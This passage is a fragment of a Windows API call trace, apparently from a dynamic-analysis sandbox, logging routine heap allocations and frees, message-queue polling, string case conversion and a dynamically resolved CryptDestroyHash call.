wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0242.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.894] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.895] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.895] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.896] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.896] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.896] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.897] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0242.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0242.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0242.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.899] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0242.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0242.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.900] CryptDestroyHash (hHash=0xaa5820) returned 1 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0242.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0242.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0242.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0242.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0242.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0242.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0242.908] HeapFree (in: 